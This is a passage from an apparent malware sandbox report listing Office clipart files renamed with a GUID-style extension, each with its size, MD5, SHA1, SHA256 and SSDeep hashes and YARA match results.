SHA256: 8525970e0055f45745fcbf669dfdcde29a921b383a4bbc1757c8defa8b20ba38
SSDeep: 96:VN22YGnMCzd5OpkdsoRVT+RrE+zzyStUsDDS3DPjD:Wtm7OZoRkZE8yStUsPS3DPjD
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196354.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 13.38 KB MD5: f5fae6ce337d4338c4f6b3e581bc21d1
SHA1: 11a16a81c379c08f84c5fdbb867728558dfc5317
SHA256: 7a333381b5e8206d3c94e5c4b5cc8e9c1cd793d19aba082f797573885c24a6e1
SSDeep: 384:KEMyT8EAFIvYGfKDtIfEOxO7blNtgBziCHkYMnbWnxH7bWTW0Aj0b1p6bFlp7d4W:KjyT8EAFIrfatIEOxO7blNtgBziCEYMI
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0197979.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 39.29 KB MD5: a1520f8e477cc2c51b2156f9b0faab12
SHA1: 80a8ea8ebcbef0328f30ff697e47bdb4eb04477f
SHA256: f538e52263b2060c3899212c1e177d0c85a674522613b9f582525d5e50ffceea
SSDeep: 768:wSCsCm/FYul/Ycv2ZnOAKbEgrJu0NzYCLQ8hV1Gz:2sCeP9YcOWJu0CCLz8z
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0197983.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 25.64 KB MD5: 147521eceb01ae186c37b17c9ea83d91
SHA1: 93f875cdcdfa28c05a490a7f56f96812580fb1a5
SHA256: b3a32bba6253e3af2d6ed4b239535c19a71b34901df9ac847b00a54022de51d7
SSDeep: 768:JbAGYRCorlYPmynEgcNyICltsLMBj0xhLRh7J4B1dIU2nf:RurrWACltNjOLRh7I1qUE
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198016.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 33.15 KB MD5: e6f3a44d63640d7d12da08ac5ad17127
SHA1: 86a6ea59aead57a107265cf7298e3fabd28a6981
SHA256: 65e41be285207415dacaf60dd9fb0b2d103f8e1a8fecbb528eb9c9615ac64370
SSDeep: 768:JmKV1lamISslEzSYf2SwrWP50EHCqTn1NNHQpRFselBwe0G2+:JmKlslWNfiE0EHVTn1NtQz0GL
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198022.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 25.54 KB MD5: a367ff68e9d4d1be608d33bbb74b3f2c
SHA1: ab03ee658e9c8c8e8e82ca0ae6a18ac10532096d
SHA256: a8aa58e1e5aca7a33a3cfa87b082a1888255a967a8cd70731b659239e342602c
SSDeep: 384:rkB57WgllG0t6hlV1MwsXNbkTPllOgqwY7Xeqq1XEYIbc8ktF0KGLs3:257h8x1bWkTPllOgnaXeqq1KUF0KAs
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198102.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 53.68 KB MD5: faa6a57d18e5912517afb56e61bbf7ae
SHA1: 3b4c86040e25a5068d9080fd614e5cbdc725505d
SHA256: 27c0f565b0050e650acb1e65824d91dc86a5c369c56a4b12ccf7f1cfb604c44f
SSDeep: 768:L28vgA58O3Swr//q0CGRF9kIp8ecsoBHwmj4OxtHRfbapNtzOUlqHFoAa8fuGP8I:R980JrXqdGvdp8ecf54OxthertSU2zaC
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198226.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 40.92 KB MD5: e847a60dad540b36fd83be21702c6384
SHA1: 8d6543f6151832290b937814e0306582b5c635a3
SHA256: 4545f2f9fd9abfa5b44c731ad0f3c20f04df5a5187a6e9338963eb7bd1e0a76f
SSDeep: 768:9erN3tQbEv5B7TRPNnMBoiFoRtBJk/zBfLYkqUPd4gh8H+892Kqd:uNd7B3RPVMBo4ov0MDwdlae89nq
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198234.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 41.66 KB MD5: b4cde9b580fd03485a1aafffa339671f
SHA1: 33c3953b58400a0e5d83392b73b0304923599f31
SHA256: 50eb348d387dbe3c42a8460c9993f315f90c7ec62b3e900d7952cab2829c5cad
SSDeep: 768:M43rBsMVdlX+bW48ak3RVZoB2vKosy57+i+7+CKntjrRahC5DScZQj/V:7uMNX+bW49k9E2Sosy57+qCKnlrRMaS1
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198372.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 27.90 KB MD5: 9e903715b6736f0f48a792762a1dedd3
SHA1: 3eee17b7f539055d1a7a5b531c1c1ccf9a2b4c4c
SHA256: a61f57d24902f7361d3149be8ba6e4b0ebb2af84e1eb1d419ecf09a4d998f9d4
SSDeep: 384:PK+X13iKnByPOMRv9wZm+IgOuJiaiYbV1oPrYsL8Ydn4V4jP8ou9W0jO0GDo2:PK+YKBtM3+gaviM8ksL8Yd1/x0joo2
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198377.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 39.36 KB MD5: 832eb0eb2f303f1a9382b154d7a9404b
SHA1: 3ba6abef5292a68f4f9e5a76a7286445b63e4b7d
SHA256: 7088438d944bf056457edc07570a94046a01f18e239f3ab828fcb1de3f6bd8e8
SSDeep: 768:qGwMiWJF6F6nt0XNAshX/w00RW/kbcyI63TPLzVXKA5:LwMvSQnCXNAOIFUkbcyIqVXf
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198447.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 48.51 KB MD5: 0fd9dca4b1b2ace9c16d260340bf5edb
SHA1: 728d496bde7bd43fa718fe67f3f8239a78d2a7a8
SHA256: 604e636676007fe95933f9963aaf185f5e46baba7bf6e89d1913a0a9e83d738c
SSDeep: 1536:z6ehXKTMqFAX2ypGhsl7vGhIq0zt5271e0G:zfKg/2psshjE0G
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198494.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 43.51 KB MD5: a2b8bdb4b0c9669a30515ed27cea9629
SHA1: 269dfb1ddc01a0b3f229edeb983cddd3196e8e57
SHA256: ae06d03c8ddd804c37b139094f902614c9dc78581518917e69fb7d92ff8b476f
SSDeep: 768:06guG6SLfp5BkpnhYRYlXL4jSpjRzy9vvD6eLXyY5i7xPs0LvG/d5CBXNw:lgnlepnhXbjpQ76e7p87xk0LidCXe
False
Modified Files
»
Filename File Size Hash Values YARA Match Actions
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107288.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 13.12 KB MD5: 8b53241ed3117e59777f758a906be2e0
SHA1: 60255a0bd5fcb88956fa763315b7f56600342dbe
SHA256: 1caa9e4e3deadf86fe7fae7716f97f4f028b14296443ecbc20c4ecb8df8cbdc8
SSDeep: 384:/G0U8CP9jdbyEGhR1NjqqvDQQymfR9RXeazzrMwN8iDzT6vWTcBa+TjA5G6qPmMp:/G0U8CP9jdblYR1NjqqvDQQymfR9RXLQ
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107290.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 12.02 KB MD5: 3af01b266090bc263f70f26e187d9188
SHA1: 77199550344f38c1de02e0a8f0c69eb7ed6e4959
SHA256: d523ed922020194d53b5af2dea6b4f10027e9068dfc1d0fafb3d857450e5b8a7
SSDeep: 384:ye/gqPugZ6984YzOPthcRSNAJHckDgSJSOmqOx310TfQt4XWVL6uC7bqCDqeUX7R:yepPVZ69pYzOPthcRSNAJHFDpSOmqOxV
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107302.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.04 KB MD5: caa51981f790208fec5861a84ed882fe
SHA1: 7e8d04e7d1f62496457099eebf04077ef0812585
SHA256: 1b4597fc6b2b56b84e84084c9618fce0734c7b397e35ff7fdf5689ef42f3bfc4
SSDeep: 96:lJHLVeyQrh8bZ+9ZilTTorp5uxz+ofonMRtbLi8L02fRKPl4Wbf:PHL8yQWbZ+LilTsbu7gnMR5G8I2fReaU
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107308.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 15.52 KB MD5: 6cfe471841ce98aad52a1675d31b69a0
SHA1: b1fbc10ff8e1520d54d030dd518833de49d69941
SHA256: 87aa4371a87f878f2d024bd8b79ed0e908e66cd502301bc1b64c733f842a91ac
SSDeep: 384:UfGj5fHKMlWM4GthwvgoAD75cUgGukewsZ7t1zmPm+RZkVyO+UHEu6Vrba7uDN4q:UfGdfHKMlWM4GthwvgoAD75cUgGukewJ
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107316.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 11.02 KB MD5: 7cafe9318d11d3c7783545a8df7273df
SHA1: aaaa36f4e3b650a76de8b1ac69602b4f4b67c162
SHA256: 4238b6cf680b3b3c58521265563f1833f8a05a0bd42e2c59c137836ea491f1d2
SSDeep: 192:CNQ9DWz2hsJLksoeRJ5Vityipm7/99QGTmq52kwC7ZCxgZGlw42LG7YDXCt8w7Zm:CNQ9DWySJLkje5ctyic/99QGTrokwC7j
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107328.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 6.38 KB MD5: 3631bc5a9af7146794b975059ecb1dee
SHA1: 3483a589890f6b1fe7f19c5ec42d4f404ef0c2b6
SHA256: 25c15e8823fa81d7537add870e396368ff4cf6d3f49d68e51cb4e16df029d48d
SSDeep: 192:2n89Z2Bz7X4bJvj5h0Y+2k2Juw/TcovVUrwwHzlklMEev:2890Bz7X4h5+2k2Juwr/vVeXTlkl/M
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107350.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 23.12 KB MD5: 3378925ed5aea808a01a8960271ce219
SHA1: bdc2a3b19785c068cb1af6fc369917c12dc10c00
SHA256: 4f3362cae58f9dab6c38f9d32402345e843442b607e4bfe4bb99f5044a9f8d2f
SSDeep: 384:sVWZjfdP605HG98bWfaMtyp/WDoa4hKWlzYe7T7L3UcHQoi3SJIEiMREQrAF31km:sVWZjfdP605HG98bWfaoypODoa4hKWl0
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107364.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 16.20 KB MD5: 72bd82c5981b39ec105a841d89af9587
SHA1: 13810b98f348b02c3d0c24c9aee6d8ab9ec8b02c
SHA256: 4ead3a556034ccb691a808ff4cbac75084e676e88549ef712c5889c8d8a5168c
SSDeep: 384:mSs4uTMzj8NF1bm/vciX6+s4UtqeLCONmLO7QFY04ZmsodZQ3+zPI+7HfUlCGV7Z:mSs4uTMkNF1bm/vciXTs42TCONmLO7QO
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107426.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 11.22 KB MD5: 25a97e62e55e6b86da244fc8c78a697d
SHA1: 3c56509779d07f95ef85beefb06484aaf10e32a6
SHA256: 7cf50a3ff6109e212902d1ca9785b3c8dca26588fcda108b9d6cb1aad1fc3dab
SSDeep: 192:84LWkI4iw7RMuiJD9z48RzQHD6S93Xm7AsPPHSXNcoH2PcbwV6SK43DiwfCL31o5:84V6+biJDl3zQr9JsPPINcokR4SK4zia
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107446.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 29.63 KB MD5: d55dbf542ede184929bbfb760e0bee87
SHA1: eb54c55c08d68be15e0c9ae2b62cbdd836084e10
SHA256: 0b3ba7b76892068cd5ecffe17dd103e83ce1a803cf6b317740e1822513294a4e
SSDeep: 768:a8ZOzN6By6jk1GjXAO6uW3+0kpUtfTRFkDlpWwi4EJBestcLFyazPM6H0LKIPt+e:BZBfmtkpBCxgtGH6i
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107450.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.81 KB MD5: 9d6321cd08a967ef6faa5853ca30b21d
SHA1: 61d7080c8d1cb31c936640bf1bbc3969ba7aaef8
SHA256: 4ee697738bce6f6c5938a5e80dcaab59babe2ba2b41c7b10dc9b59a1b149c3d3
SSDeep: 96:O4JhTMDRUBryM2NWphRJ7fyMf72C712r4DupB41kJ7A1rmq6d57j:ptMD+BrGEXfOr4apBcAAyq6dpj
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107452.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 20.72 KB MD5: 243ddff13d7c9817ea9898d5ecaa7cc7
SHA1: bb801a6f03f6b5d21abe60de931f3d05c5b68599
SHA256: 4fccc5ae8144f64c1562494ea133730b5ce8b073d6f64d2297ed76ad5f5d4292
SSDeep: 384:yvVGkpGnqaPYC3IsEt0VqKKP3HNSJUBEt+hx+wbdRUxyQ2zsPo/IdAAWoAe2q3st:ytdiZIsEt0V9KPXNSJUBEt+hxVbdRUxU
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107456.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 3.64 KB MD5: f915f4dc931d283787604fe3722f2870
SHA1: 433d3304590f32bf59e632231402fa5ecc3a6e4a
SHA256: aececef37d22238f162b38d400e9152cef872074d927847f5c56c4e1312caaba
SSDeep: 96:d1JtwIjkpqHd4qZKe2bNDn2mxU7YGAILlMfAA4tV0/Ff:dfqIQpq94qMrbNDn2eiHA4A4tV0/Ff
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107458.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 3.49 KB MD5: 6f6d36014d2d79b1e8095a6fc9ca2ee8
SHA1: a99bc920a862ed6bff16514cbc2bbb4a879ee5e3
SHA256: 69f33eade56d831d923e10f83d72edbd070cdfe0f018e37c8f06e1d9a8dfb8fd
SSDeep: 96:UJIkg+7Gf7XFrs5qpp5j5LkUoKIzrG/qvqsy5q:aZg+7Gf7VrsGp5j5LkUo7/G/RsMq
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107468.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 9.39 KB MD5: 1c29e96a4df84f3ce725923c2ecb38f0
SHA1: 826cd906abf7cef9fb4fd4775e546ed578692e3b
SHA256: 6cf628b4c5e140186cfd0f00042b37c4f2d9c64b743258e3cd72690578fb400a
SSDeep: 192:pHnpxMqaiHPwKcUpkLtFU1+RL+hvz8RR3IhI4ykjORVtyBfghL1CkPbqLPvXbiPy:pJxPaiHPdcWkxFU1+J+RmR3CdykItyB3
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107480.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 5.88 KB MD5: 414482f2279e367fcef02b9656300e15
SHA1: ea05afdbca2217f6c663c38e3577f150fca43e2d
SHA256: 25e649cee79f74f9d3642372df1c91c56c408f286a0a8b5684d4a85f16fe026f
SSDeep: 96:TJLJz+8d5F1dZDNLzlP1vtuRuTEXGOC9GRgkX+pvctvNvcDoOK2PfaHpxta0Ox5R:FdS8d57dB3PTukTEk9GmkntlEDoOK1JG
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107482.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.86 KB MD5: 50bd11ab99f9b1ddeec7bb160c016fe6
SHA1: b25fbf495b9254e93a2495e9e682b8d1f706525e
SHA256: f317d8b07db6e87514b148192cc44ca61b85cafe3494c7e78b48553094302ca8
SSDeep: 96:Zabhfoml9wyRcVp6pmvC8rs5Nrf3sz6p+SGqOAokq1EAQYGN4:obdoi2FNC8rs5tG6p+SP15rN4
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107488.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 7.81 KB MD5: 973290f214909de5f746808208574be8
SHA1: 4b1b29bffbc58b9b719e9fdc0f875212a32d5230
SHA256: 78f26eb0d780bf2ac919286f945b058918acac28b199060ee53ffe9710f65061
SSDeep: 192:K/wuKVBgxUKKcw7EJhcs+93J0bL5q38jTy1rsOHXjLIABi4YjURc0x+4B9xtwhBJ:K/gBgeKbw7EJhcs+5JO5S8jTy1rsGXj4
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107494.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 6.27 KB MD5: 8a92eb8ab686ab2a29f4e547b3bb7d43
SHA1: fc80c61adcdde099753b05bc397e0d376b75e79e
SHA256: e9eee06eec1215070fcee7d635fd9a101ebe394bb4a158423b23417526a13adc
SSDeep: 192:fcTkvWUC3mLPwNZOUlCiuF3/ap7IdZldRxGz72c:fcTkvWB3mL4NsUl9A3CkDlAzCc
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107502.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 10.58 KB MD5: 0869188d9ead42f035b180dce791624a
SHA1: 96093edc2662dd7cde05cfdf256b6221dfc56517
SHA256: 126d1222853a823fe6eff32a1f6501fe1f94d1c0ae39cb3ed5090ff6b0cd8c34
SSDeep: 192:lQKTZb/zRGyaOt2B1FOUqM/0mCy1dziFgbq/BO+0f4uad/T6+P1YNV2GMo8pK4hJ:CKlb/3t2B1k4NCy/uSbqU+0f4uad/u+b
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107512.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 11.14 KB MD5: be971e78ff59e94335729bd52cabb6c4
SHA1: 81a6a69e30cb6cf15898d2c0d489181d802ebd14
SHA256: 7113c219eaf6fd9e7903f79722aa08d8412f4903258d5ee6fa24acf683aacd4b
SSDeep: 192:hyKvvZh1p/L4WXfLu2YK9PsrfhsE0/Ev/sdZz/E2Zqb5NH+4VRmMEBHj2456V8mv:hyCvZhv7junK9ErhsE0/wsHzMiqb5NHV
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107516.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 13.68 KB MD5: ed032ba4d49bda748c1f25aa63810158
SHA1: 6cd0ba0181e66204d184c3e420223f2f36baf5dc
SHA256: 5b9c8d3fa8f64d31111cc650ea70d045844acaa8f0d13c9dc4980b97a2a9603f
SSDeep: 384:gwzEB45/M9XiJvGcReUNdcO9Aho0RrCm9LnvmWmNrPMqQqgbrUsFtL7KQAT6RvQ+:g/K/MgJXVJAho0pCSLnv5mNrPP7gb4sX
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107526.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 7.76 KB MD5: 10e194bf7f7a46c8189676dbf98be4db
SHA1: 5fcfea7ee27d99f5baebcd52ba30ceda15a5b159
SHA256: 198f1f75522739051b7c922d9370e8ac8dfc636687f484c9dec1e5a6530f5ed2
SSDeep: 192:696kQeikN8Bxje+7hgDft/sk1daly/wulZO709hRE/q/XwdYITl67qDv0Cq:696kQeikN8Bb7hgDZsEdiiw5709hRiqz
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107544.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 26.14 KB MD5: 7267f99593f5310a3f5bbdc821d76b55
SHA1: 429cb15228fa7928eab0fa917ec537075222acd2
SHA256: 2d8a12283406e429ff65031c6e0c9daef2bba3c3dfd04e8f26785ef51e41b191
SSDeep: 768:hVZpYJR7hKydVEdYukogUTuJmsYvP8mFfvGokuxBtullFodaNgZZg7C+VbME2HNH:aewbYrmJruT30C
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107658.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 6.91 KB MD5: bef1278d61c3e13f4e960810ba8b3d1f
SHA1: e4a094918c6678b7e953b491733a02c2a5823937
SHA256: 8a6cee1ca14117b310a7738f9462d56874442bee5b0513ab3cb02c235d34563b
SSDeep: 192:GFmXyToTKBgS7xx8tF05xFphGp7nY0LonTg4uQcmXgKiiD:G8hKzx8F05PphGRYiOT3uQcmX5b
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107712.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.53 KB MD5: ebda1a96ba249ed0f5c85d4a40cefc32
SHA1: d2538f8eb5005ea19e3417d21a6ab5029ab53aef
SHA256: 177adc65310d70288268042dbf26ff7276e77e2c2ff01e9c68a5963d71f0c7d9
SSDeep: 96:SJrKauDFy7qbOoySVG1OXEmiHm/2l1bc7xJZb0ggmtum+Kw1zSS87Fs7Y6I:orKaQFGqqopGsXEmiGewHWjmtumVw1zi
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107718.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 3.71 KB MD5: 4ca178fb698050cd53e11b44568d7c3f
SHA1: 09e2ecffdf7b3d9bf6b64134fb18b6ad70b1b9e2
SHA256: 5d11c2565237de6502011612eba84914ce979c841dfd2dfddf27313ed2c2cb4d
SSDeep: 96:qJWf8j5IqDm353vBLHq1ysDClNRW2bgghqKDxeo:wzjuqA53vBLHq1yCCLRW2cg08/
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107728.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 5.36 KB MD5: 2e3abf704909de11090ba93ceb6e4b0d
SHA1: 7b55057e8e44ea9b553f65dba0f45164c5215629
SHA256: 28b7e4436da48ecc9aa827f87651faf56ce53c47896269d7234cd8ab62343872
SSDeep: 96:SJCo2aMTTH5Q8bddToUFLGVEbYqHtT7KXLwe8pjBL1zcVleppqg1UbzGqokQhCyi:o3PETH5Q8vToUF/bFHtT7K7we8RBLYQ6
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107730.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 2.99 KB MD5: 762c15595e4091647e74dbe1edeb7695
SHA1: 7765b1d69190e247a9d7f31d22f5cdde6807f001
SHA256: a60214b6bbfaadf62c6e5901a5f14512781c524a46694c597e95d3e6e66cd481
SSDeep: 48:1tjWB4gYT8EhuQjSx01O5RamJlIyfnZPc+1ZhtYtDm/DjhOxcyHtGKmPSqRmwmjg:DIJkuQjO005Em/IOBNvtcD0/hoFH5mPb
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107742.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 3.56 KB MD5: b1185243d4582648dfb19c2cc9903411
SHA1: 14ff0fd2210b7fbcf0e58aca8568814eb3f8377c
SHA256: 96265c98ece34ff2602f688ae9edc8f32e708b8495f56399bd6360735e605b77
SSDeep: 96:eJzqKzqWRk6z/pbS0t0+k0zv4od48xbtI5kShmEZ6q8Cew8Rqo:UmKmWRB/xSk0b0Tn48xbyuSwEEq9ewC
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107744.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.89 KB MD5: 85f497cf9c462d38b4a2c08010c56bb1
SHA1: 327b4b5eb1383f165bf58eb2c703d51f88a2948a
SHA256: 9b5d0c297d012c08785cfd30690c94d3f93bca24b9e0fd456b30ebe09a5117dd
SSDeep: 96:kYJeZad5a4yYnWyA7caqzLbZri9Imjk1s/IGxcmc8i9ZZzvL6N/Us0zm:k+eZad5a4yEY7caiBaImjZAucrZwcq
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107746.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.68 KB MD5: ef06619d08fe99d20f3a7f8d58428ed6
SHA1: 899e393ffffed499ccd46198b8d1a7a7d6572312
SHA256: 3428a608df8b640ade62699af9bd4706b099070dcd7f67fffa5a993a08ef9ab4
SSDeep: 96:t3J14Lkl8La1yJZhQ8ct5VJ6EMgA/nNRWjaXbT31ccmVJwjSqFM1eFnGHhgFH/Zx:tZ14LkqLa1y9Q8ct5jZMgAFRWmXbTFwA
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107750.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.61 KB MD5: 816de2f191f7cba91cfd1d86e2fa50b5
SHA1: aa881113239c19b6cb47f08fb6fa0e066f659c62
SHA256: d30f96c58efe9f97dc9b6684dceb41dd1e5281c599c672c29b8c08ca0f615008
SSDeep: 96:8JkC3UWA2sivbD+jSL4crqtjvrP2vSL+VwpmHeslYrZoUyM4niETJ+tHyQz8uNVG:yr3UF2sivbD+jSLFm1TOvwqSm+s+rakO
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145168.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 32.87 KB MD5: 9d7cfca66d8cab9f418cb5a28ea68036
SHA1: c9b0a09a7f59d4c654744f9bcb72b19f1da18036
SHA256: 38729132e03be73f7f7518e1ef895174015ed45a370f0b9a9e6513e8b3ada77f
SSDeep: 768:dWpTKgjy01DFafmClVFa0Xpwswhi/9xEJ9uEuh9ZbpC6:dWpOg+01DFafpVU0b/9Ykh/NC6
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145212.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 60.19 KB MD5: 35a0a73c156f1b844800dd52d1b0a012
SHA1: b0d899287d8108f2e836efa005b95460260096ec
SHA256: 20c4bc46d97fd12fe35c3fd2c0ce5cad6d09e69bdfc735346969b2b98196db9f
SSDeep: 1536:PPiKsRqt6PE83jl2sju60KX1MI7qb9+w/h76FqBUMXqxUA:PK1R5X8sC60KXeb9+A+Fko+A
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145272.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 48.08 KB MD5: dae0074a8e87b99f2add3e069c261f4c
SHA1: 27d5f62feaf3ed9f823f477d4a832f31461e0988
SHA256: f99bde890a8c419ba83e30ac4cd5d6a431e5e631b8ba1e785bbe3c225da5e2e4
SSDeep: 768:iT6L7TbuPsvYWB22peAx9UiLdGBTgSjDgVY0Uu9Z9aaOv0d7oeR9mQn1R:iub4lYxxLdEkSy47vA75tH
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145361.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 20.63 KB MD5: 4f4c8690c26e90e282000e1b08142d7d
SHA1: dc6a6f88c44318aad56c161064a2ae40cac69986
SHA256: 411e1fcffbb3793a501ec53f42b31935ae0e54a0cb63ff48b1a345bf7937f0c3
SSDeep: 384:UZRPm/9Xt1EzGzapJ6XU5fvqAeSyIlKQJW8N/fCg3YJ3OXpr0:gmFb3NU5uSy5QJDh3YyI
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145707.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 35.96 KB MD5: 86608ea4a293e976f90f5c9a815eaf79
SHA1: 0668f587c5b77e3a078380e675b4da883f06bf5a
SHA256: 6228495eb3b7b17fce594f43f6be03c96a09682d9b2d4fbcbbcc7ba0f9ec4c0f
SSDeep: 768:R7DCWabrapxjoU81Kbrim6ZmdeNly5hLNACHhEehre+Tv:9C/PAjoDe6Z4eXy5VWoxI+Tv
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145810.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 35.93 KB MD5: 9d84bbc4877dd87eb49dfbaf2600381b
SHA1: eaa4d2e22734fad15c0ad77245084ff61ffa23d8
SHA256: af3db9a3ba2ba5fb2d1764b413428c71e3537c601117ad1c94a1d792c5733f63
SSDeep: 768:TOj73vsFUZgRi90oPG9GG03LXbRCLpaBU9ECH7NKRqaf:CjzslRS0SG0G03LrRCLpaBUcRDf
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145895.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 33.16 KB MD5: bbc8217cc6980cb171a687a19332b348
SHA1: 644aca83387424cb380ed46fa7ceea29a8cb42b7
SHA256: 068be57dbee2f280bca1f84e4ccbba12e662df3918f70d1f9474102ac0800060
SSDeep: 768:VBk1e1WYy5syNHMuoXqEhGefSXSbSu3VPeNcL+tzl:VBk1e1WNsyl4fwRSbSu3VPeeGl
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0146142.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 45.42 KB MD5: b78aff98136c03588270a66a6a08a367
SHA1: 71427a90e8fa75702b1c330a61431b0aec275a13
SHA256: 0283046d21445d22a4cb34a3298d17db7e5099847e0c8ddedfb46ad1955c8467
SSDeep: 768:FJgT43dZKS5wKhCde4ED4RCSpVMTq9AWGi5s2QzTsgvewUfrQi+D4ovA1i:UT4vX5w417SpmTq95G4xKsgveNfrWD4M
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0148309.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 42.65 KB MD5: a3372017207e25e5ddde542ae9fc7be2
SHA1: 039f705a23c239add191a82e98e7016632c47fcd
SHA256: 8c5f53e002af32994b6e8ab9b9dc089e3a9fbdbbd7e1c9e1a57ea7d3e96115fc
SSDeep: 768:WPzpNFGuDhzVWmCigxdSCAJckY4/67YnaoaVxXAR//2ZcLrCIpjVa2cegul:WPHLhzVWmnwdSCAqW/taoabXg2ZcnC2p
False
